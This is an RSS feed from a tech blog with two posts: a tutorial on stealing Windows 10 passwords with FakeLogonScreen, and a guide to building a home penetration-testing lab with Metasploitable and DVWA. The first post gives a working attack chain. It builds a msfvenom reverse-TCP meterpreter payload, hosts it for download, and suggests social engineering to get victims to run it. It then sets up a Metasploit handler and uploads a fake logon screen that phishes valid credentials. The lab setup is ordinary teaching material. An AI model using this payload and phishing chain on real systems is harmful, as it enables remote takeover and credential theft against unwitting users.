<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>kali linux Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/tag/kali-linux/feed/" rel="self" type="application/rss+xml" />
	<link>http://kostacipo.stream/tag/kali-linux/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Tue, 27 Oct 2020 19:57:56 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>kali linux Archives - Tech Chronicles</title>
	<link>http://kostacipo.stream/tag/kali-linux/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to Hack Windows 10 Passwords Using FakeLogonScreen in Kali Linux</title>
		<link>http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/</link>
					<comments>http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Tue, 27 Oct 2020 19:57:56 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[kali linux]]></category>
		<category><![CDATA[passwords]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1835</guid>

					<description><![CDATA[<p>This article demonstrates an in-depth guide on how to hack Windows 10 Passwords using FakeLogonScreen. Hacking Windows 10 password is an exciting topic, so I decided to make this windows hacking tutorial. I will use FakeLogonScreen and Kali Linux to hack Windows 10 passwords. FakelogonScreen is a handy and stealthy tool that creates a fake [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/">How to Hack Windows 10 Passwords Using FakeLogonScreen in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This article demonstrates an in-depth guide on how to hack Windows 10 Passwords using FakeLogonScreen. Hacking Windows 10 password is an exciting topic, so I decided to make this windows hacking tutorial.</p>
<p>I will use FakeLogonScreen and Kali Linux to hack Windows 10 passwords. FakelogonScreen is a handy and stealthy tool that creates a fake Log on-screen on a target machine running Windows 10. This tool enforces the target user to enter the correct credentials and, after getting it, passes it to the backdoor attacker.</p>
<p><a href="https://twitter.com/bitsadmin">Arris Huijgen</a> developed this useful tool, it takes advantage of the normal behavior of the Windows environment, displaying the login screen when it comes out of sleep mode, and asking to enter credentials. At that time, this tool looked for phishing Windows credentials from the target, and the strength of this tool came in when it only accepts the valid credentials.</p>
<h2>Steps to Hack Windows 10 Password</h2>
<p>Now let’s try this tool and perform the exploit. We need to deploy two virtual machines i.e. Kali Linux and Windows 10. In my virtual lab environment, the Kali (attacking machine) has an IP: 192.168.0.103, and the Windows (target machine) got 192.168.0.100.</p>
<h3>Download the FakeLogonScreen in Kali Linux</h3>
<p>First, we need to download the FakeLogonScreen executable in our attacking machine from the link:</p>
<p><a href="https://github.com/bitsadmin/fakelogonscreen/releases"><em>https://github.com/bitsadmin/fakelogonscreen/releases</em></a></p>
<p>Now assume the target machine is connected to the same network as the attacking machine.</p>
<h2>Creating the Malicious Payload to Hack Windows</h2>
<p>We will create a malicious payload by using msfvenom tool according to the information acquired by the target system. We will set lhost to our Kali’s IP i.e. 192.168.0.103, and set lport as 4444. Since we are interested in exploiting a Windows system, we will generate a payload as an executable file to easily gets it executed on the target machine. Use command:</p>
<p><strong># msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f exe &gt;&gt; payload.exe</strong></p>
<p><img fetchpriority="high" decoding="async" class="aligncenter wp-image-7606 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows.png" sizes="(max-width: 630px) 100vw, 630px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows.png 630w, https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-300x75.png 300w" alt="Creating the Malicious Payload to Hack Windows" width="630" height="158">Here the ‘payload.exe’ is the name of the generated payload. After that, we will run Python One-liner to create an HTTP server that will host this malicious payload at port 80 of the target machine.</p>
<p><strong>#python -m SimpleHTTPServer 80</strong></p>
<p><img decoding="async" class="aligncenter wp-image-7607 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-2.png" sizes="(max-width: 629px) 100vw, 629px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-2.png 629w, https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-2-300x31.png 300w" alt="Creating the Malicious Payload to Hack Windows 2" width="629" height="64"></p>
<h2>Download the Payload on Target Machine</h2>
<p>All set now, the most crucial stage came when we have to get the target to download this malicious payload. In real-life scenarios, an attacker can use different social engineering techniques and let the target user to download this malicious file into his system.</p>
<p>For practical demonstration, we will access our Kali’s machine directory from the Windows machine and download the payload.</p>
<p><img decoding="async" class="aligncenter wp-image-7608 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine.png" sizes="(max-width: 893px) 100vw, 893px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine.png 893w, https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine-300x178.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine-768x456.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine-696x413.png 696w, https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine-708x420.png 708w" alt="Download the Payload on Target Machine" width="893" height="530"></p>
<p>This will also be showing the current logs in our Kali machine.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7609 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Kali-machine.png" sizes="auto, (max-width: 622px) 100vw, 622px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Kali-machine.png 622w, https://www.ehacking.net/wp-content/uploads/2020/07/Kali-machine-300x45.png 300w" alt="Kali machine" width="622" height="93"></p>
<h2>Launch Metasploit to Exploit</h2>
<p>Let’s get straight back to Kali and launch Metasploit-framework.</p>
<p>Use multi/handler module.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7610 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Use-multi-handler-module..png" sizes="auto, (max-width: 633px) 100vw, 633px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Use-multi-handler-module..png 633w, https://www.ehacking.net/wp-content/uploads/2020/07/Use-multi-handler-module.-300x30.png 300w" alt="Use multi/handler module." width="633" height="64">Set the windows/meterpreter/reverse_tcp payload.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7611 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Set-the-windows-meterpreter-reverse_tcp-payload..png" sizes="auto, (max-width: 629px) 100vw, 629px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Set-the-windows-meterpreter-reverse_tcp-payload..png 629w, https://www.ehacking.net/wp-content/uploads/2020/07/Set-the-windows-meterpreter-reverse_tcp-payload.-300x30.png 300w" alt="Set the windows meterpreter reverse_tcp payload." width="629" height="63">Set lhost as our IP i.e. 192.168.0.103 and lport as 4444</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7612 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Set-lhost-as-our-IP-i.e.-192.168.0.103-and-lport-as-4444.png" sizes="auto, (max-width: 632px) 100vw, 632px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Set-lhost-as-our-IP-i.e.-192.168.0.103-and-lport-as-4444.png 632w, https://www.ehacking.net/wp-content/uploads/2020/07/Set-lhost-as-our-IP-i.e.-192.168.0.103-and-lport-as-4444-300x46.png 300w" alt="Set lhost as our IP i.e. 192.168.0.103 and lport as 4444" width="632" height="96">After configuring it all, just run the exploit, go back to the Windows machine and run the executable, i.e., ‘payload.exe’. This will quickly get us a meterpreter session.</p>
<p><strong> <img loading="lazy" decoding="async" class="aligncenter wp-image-7613 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/exploit.png" sizes="auto, (max-width: 621px) 100vw, 621px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/exploit.png 621w, https://www.ehacking.net/wp-content/uploads/2020/07/exploit-300x83.png 300w" alt="exploit" width="621" height="172"></strong></p>
<h2>Upload the Executable</h2>
<p>Now upload the FakeLogonScreen executable that we downloaded earlier. Make sure to give it the correct path of the exe file.</p>
<p><strong>&gt;upload /root/Downloads/FakeLogonScreen.exe</strong></p>
<p>After that, get the shell access and run FakeLogonScreen.exe as showing below:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7615 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon.png" sizes="auto, (max-width: 890px) 100vw, 890px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon.png 890w, https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon-300x105.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon-768x269.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon-696x244.png 696w" alt="FakeLogon" width="890" height="312">And BOOM!! At the target machine, all the running windows would get closed, and the logon screen would pop up, asking the credentials and appears it as a legitimate window. The user would not hesitate for a second to enter his credentials and get his work back.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7616 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/target-machine.png" sizes="auto, (max-width: 1015px) 100vw, 1015px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/target-machine.png 1015w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-300x226.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-768x577.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-696x523.png 696w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-559x420.png 559w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-80x60.png 80w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-265x198.png 265w" alt="target machine" width="1015" height="763"></p>
<p>To check the strength of this&nbsp;tool, we will be entering the wrong password.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7617 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/password.png" sizes="auto, (max-width: 1019px) 100vw, 1019px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/password.png 1019w, https://www.ehacking.net/wp-content/uploads/2020/07/password-300x224.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/password-768x574.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/password-696x520.png 696w, https://www.ehacking.net/wp-content/uploads/2020/07/password-562x420.png 562w, https://www.ehacking.net/wp-content/uploads/2020/07/password-80x60.png 80w, https://www.ehacking.net/wp-content/uploads/2020/07/password-265x198.png 265w" alt="password" width="1019" height="762">And this will show the error “The password is incorrect, try again.” This is the strength of FakeLogonScreen tool that enforces a target to enter his correct password. The user has no choice other than that to enter his password.</p>
<p>Let’s enter the correct password, and you will get your standard window as nothing happened before.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7618 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/correct-password.png" sizes="auto, (max-width: 1015px) 100vw, 1015px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/correct-password.png 1015w, https://www.ehacking.net/wp-content/uploads/2020/07/correct-password-300x226.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/correct-password-768x580.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/correct-password-696x525.png 696w, https://www.ehacking.net/wp-content/uploads/2020/07/correct-password-557x420.png 557w, https://www.ehacking.net/wp-content/uploads/2020/07/correct-password-80x60.png 80w" alt="correct password" width="1015" height="766"></p>
<p>This also showing the FakeLogonScreen works similar to a keylogger. The attacker would easily monitor all the logs and could grab the correct password of the target user.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7619 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/user.png" sizes="auto, (max-width: 629px) 100vw, 629px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/user.png 629w, https://www.ehacking.net/wp-content/uploads/2020/07/user-300x124.png 300w" alt="user" width="629" height="261"></p>
<h2>Some Useful Information</h2>
<p>This tool could also work effectively on multiple desktop systems. While running it on various desktops, all the affected screens turn black immediately after executing the exploit from the attacking machine. This works even if the target user has set a customized background.</p>
<p>The zip file of the exploit also includes another executable named “FakeLogonScreenToFile.exe” that works the same as the previous executable. Still, it has some extra features i.e., not only showing the password but also stores it in a file %LOCALAPPDATA%\Microsoft\user.db.</p>
<p>This tool can also be integrated with Cobalt Strike to work effectively.</p>
<p>The post <a href="http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/">How to Hack Windows 10 Passwords Using FakeLogonScreen in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How To Create A Virtual Penetration Testing Lab At Home</title>
		<link>http://kostacipo.stream/how-to-create-a-virtual-penetration-testing-lab-at-home/</link>
					<comments>http://kostacipo.stream/how-to-create-a-virtual-penetration-testing-lab-at-home/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Fri, 28 Aug 2020 12:14:58 +0000</pubDate>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[kali linux]]></category>
		<category><![CDATA[pentest]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1808</guid>

					<description><![CDATA[<p>&#160; In this article, we will demonstrate how to create your own virtual penetration testing lab at home. Creating a pentesting lab is must for learning different testing tools and hacks out of legal trouble because hacking into other computers and networks where you don’t have rights to access is illegal without prior consent so [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/how-to-create-a-virtual-penetration-testing-lab-at-home/">How To Create A Virtual Penetration Testing Lab At Home</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<div class="tdb-block-inner td-fix-index">
<p>In this article, we will demonstrate how to create your own virtual penetration testing lab at home. Creating a pentesting lab is must for learning different testing tools and hacks out of legal trouble because hacking into other computers and networks where you don’t have rights to access is illegal without prior consent so having your own lab that replicates someone else’s environment is a perfect platform to practice hacking and security testing skills.</p>
<p>Moreover, when you perform security testing on a system, there is a chance of severe damage that can permanently delete the data of targeted device or destroy the target computer or network but in your own pentesting lab you will have complete control over environment for testing and you can also configure the target to the exact specifications needed for the test.</p>
<p>Having said that, creating your own pentesting lab is easier if you are working on a virtual environment as it is cost-effective as well as scalable. So these are some prerequisites before creating your own pentesting lab:</p>
<ol>
<li>Virtualization should be enabled on the processor</li>
<li>VirtualBox or VMware must be installed</li>
<li>Atleast 8GB RAM of the host machine is required</li>
</ol>
<p>In our setup, we will configure one attacking machine (Kali Linux) and three target machines (DVWA, MetaSploitable and Windows10) on which the attacking machine will generate some exploits</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5359 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/DVWA-MetaSploitable-and-Windows10.png" sizes="auto, (max-width: 616px) 100vw, 616px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/DVWA-MetaSploitable-and-Windows10.png 616w, https://www.ehacking.net/wp-content/uploads/2020/02/DVWA-MetaSploitable-and-Windows10-230x300.png 230w, https://www.ehacking.net/wp-content/uploads/2020/02/DVWA-MetaSploitable-and-Windows10-322x420.png 322w" alt="DVWA, MetaSploitable and Windows10" width="616" height="803"></p>
<h2><strong>Kali Linux</strong></h2>
<p>Kali Linux is a Debian based Linux distribution designed for penetration testing. In this setup it will be our attacking machine because it has some pre-installed penetration testing tools i.e. (<a href="https://www.wireshark.org/download.html">Wireshark</a>, <a href="https://www.aircrack-ng.org/">Aircrack-ng</a>, <a href="https://www.concise-courses.com/hacking-tools/vulnerability-exploitation-tools/beef/">BeEF</a>, <a href="https://portswigger.net/burp/">Burp Suite</a>, Metasploit Framework, <a href="https://github.com/vanhauser-thc/thc-hydra">Hydra</a>, <a href="https://cirt.net/Nikto2">Nikto</a>, <a href="https://www.paterva.com/web7/">Maltego</a>, <a href="https://nmap.org/">Nmap</a>) aid the pen-testers to gather information, perform scanning and find some vulnerabilities.</p>
<h2><strong>MetaSploitable</strong></h2>
<p>MetaSploitable is a virtual machine that is an intentionally vulnerable version of Ubuntu Linux specifically designed for penetration testing learners to test security tools and exploit common vulnerabilities. This project is created and maintained by rapid7 Community, Originally design for Metasploit Framework testing.</p>
<h3><strong>Installation of MetaSploitable</strong></h3>
<p>To install MetaSploitable in VirtualBox download the MetaSploitable file from <strong><a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/"><em>https://sourceforge.net/projects/metasploitable/files/Metasploitable2/</em></a></strong></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5360 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Installation-of-MetaSploitable.png" sizes="auto, (max-width: 962px) 100vw, 962px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Installation-of-MetaSploitable.png 962w, https://www.ehacking.net/wp-content/uploads/2020/02/Installation-of-MetaSploitable-300x165.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Installation-of-MetaSploitable-768x422.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Installation-of-MetaSploitable-696x383.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Installation-of-MetaSploitable-764x420.png 764w" alt="" width="962" height="529"></p>
<p>Open up VirtualBox and create a new VM by selecting ‘Machine’ and choosing the option ‘New’</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5361 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/VM-by-selecting-‘Machine’.png" sizes="auto, (max-width: 834px) 100vw, 834px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/VM-by-selecting-‘Machine’.png 834w, https://www.ehacking.net/wp-content/uploads/2020/02/VM-by-selecting-‘Machine’-300x134.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/VM-by-selecting-‘Machine’-768x343.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/VM-by-selecting-‘Machine’-696x311.png 696w" alt="VM by selecting ‘Machine’" width="834" height="373"></p>
<p>Type name of the VM, set the destination where you want to install this VM, set the Type as Linux and version as Ubuntu(64-bit)</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5362 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Type-name-of-the-VM.png" sizes="auto, (max-width: 691px) 100vw, 691px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Type-name-of-the-VM.png 691w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-name-of-the-VM-300x269.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-name-of-the-VM-468x420.png 468w" alt="Type name of the VM" width="691" height="620">Set the memory size</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5363 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Set-the-memory-size.png" sizes="auto, (max-width: 694px) 100vw, 694px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Set-the-memory-size.png 694w, https://www.ehacking.net/wp-content/uploads/2020/02/Set-the-memory-size-300x266.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Set-the-memory-size-473x420.png 473w" alt="Set the memory size" width="694" height="616"></p>
<p>Use existing virtual hard disk file</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5364 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Use-existing-virtual-hard-disk-file.png" sizes="auto, (max-width: 692px) 100vw, 692px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Use-existing-virtual-hard-disk-file.png 692w, https://www.ehacking.net/wp-content/uploads/2020/02/Use-existing-virtual-hard-disk-file-300x267.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Use-existing-virtual-hard-disk-file-472x420.png 472w" alt="Use existing virtual hard disk file" width="692" height="616">Attach the vmdk file that you already downloaded</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5365 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded.png" sizes="auto, (max-width: 855px) 100vw, 855px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded.png 855w, https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded-300x185.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded-768x473.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded-696x429.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded-681x420.png 681w, https://www.ehacking.net/wp-content/uploads/2020/02/Attach-the-vmdk-file-that-you-already-downloaded-356x220.png 356w" alt="Attach the vmdk file that you already downloaded" width="855" height="527"></p>
<p>Now start the VM</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5366 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Now-start-the-VM.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Now-start-the-VM.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-start-the-VM-300x162.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-start-the-VM-768x416.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-start-the-VM-696x377.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-start-the-VM-776x420.png 776w" alt="" width="975" height="528">After rebooting it will ask for login credentials. The default username and password are “msfadmin”</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5367 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/After-rebooting-it-will-ask-for-login-credentials.-The-default-username-and-password-are-“msfadmin.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/After-rebooting-it-will-ask-for-login-credentials.-The-default-username-and-password-are-“msfadmin.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/After-rebooting-it-will-ask-for-login-credentials.-The-default-username-and-password-are-“msfadmin-300x187.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/After-rebooting-it-will-ask-for-login-credentials.-The-default-username-and-password-are-“msfadmin-768x479.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/After-rebooting-it-will-ask-for-login-credentials.-The-default-username-and-password-are-“msfadmin-696x434.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/After-rebooting-it-will-ask-for-login-credentials.-The-default-username-and-password-are-“msfadmin-674x420.png 674w" alt="After rebooting it will ask for login credentials. The default username and password are “msfadmin" width="975" height="608"></p>
<p>After logging in successfully you will get the MetaSploitable prompt</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5368 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/After-logging-in-successfully-you-will-get-the-MetaSploitable-prompt.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/After-logging-in-successfully-you-will-get-the-MetaSploitable-prompt.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/After-logging-in-successfully-you-will-get-the-MetaSploitable-prompt-300x187.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/After-logging-in-successfully-you-will-get-the-MetaSploitable-prompt-768x478.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/After-logging-in-successfully-you-will-get-the-MetaSploitable-prompt-696x433.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/After-logging-in-successfully-you-will-get-the-MetaSploitable-prompt-675x420.png 675w" alt="After logging in successfully you will get the MetaSploitable prompt" width="975" height="607"></p>
<h2><strong>DVWA</strong></h2>
<p>Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that provides a platform to practice hacking. It is the best platform for beginners to come and practice security tools because it is damn vulnerable as mentioned in its name.</p>
<p>As hacking is an illegal practice there is a requirement for security professionals to test their skills and tools in a legal environment and help web developers better understand the processes of securing web applications. This could be achieved by using DVWA that is got a lot of vulnerabilities, helps the beginners to learn and practice ethical hacking.</p>
<p>It runs on a local server hence there is no need for an internet connection to use this web application. It has different security levels as a beginner, intermediate, and expert to aid security professionals at every stage of learning.</p>
<p><strong>Stages to Install DVWA</strong></p>
<p>We are using Kali Linux operating system to install DVWA because this OS is designed for penetration testing and there are many pre-installed security tools present in Kali Linux. After that you require to configure a database</p>
<p><strong>STAGE 01: Install DVWA on Kali Linux</strong></p>
<p>Go to web browser in Kali Linux and search the link <em>github.com/ethicalhack3r/DVWA</em> to copy the address</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5369 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Install-DVWA-on-Kali-Linux.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Install-DVWA-on-Kali-Linux.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Install-DVWA-on-Kali-Linux-300x198.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Install-DVWA-on-Kali-Linux-768x506.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Install-DVWA-on-Kali-Linux-696x459.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Install-DVWA-on-Kali-Linux-637x420.png 637w" alt="Install DVWA on Kali Linux" width="975" height="643"></p>
<p>Now go to terminal and switch the directory to /var/www/html/ because all the files need to be installed in this directory to run the web application</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5370 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/installed-in-this-directory.png" sizes="auto, (max-width: 439px) 100vw, 439px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/installed-in-this-directory.png 439w, https://www.ehacking.net/wp-content/uploads/2020/02/installed-in-this-directory-300x100.png 300w" alt="installed in this directory " width="439" height="147">After switching the directory type git clone and paste the address that you have copied from browser</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5371 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/After-switching-the-directory-type-git-clone-and-paste-the-address-that-you-have-copied-from-browser.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/After-switching-the-directory-type-git-clone-and-paste-the-address-that-you-have-copied-from-browser.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/After-switching-the-directory-type-git-clone-and-paste-the-address-that-you-have-copied-from-browser-300x42.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/After-switching-the-directory-type-git-clone-and-paste-the-address-that-you-have-copied-from-browser-768x109.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/After-switching-the-directory-type-git-clone-and-paste-the-address-that-you-have-copied-from-browser-696x99.png 696w" alt="After switching the directory type git clone and paste the address that you have copied from browser" width="975" height="138">The DVWA file has successfully cloned</p>
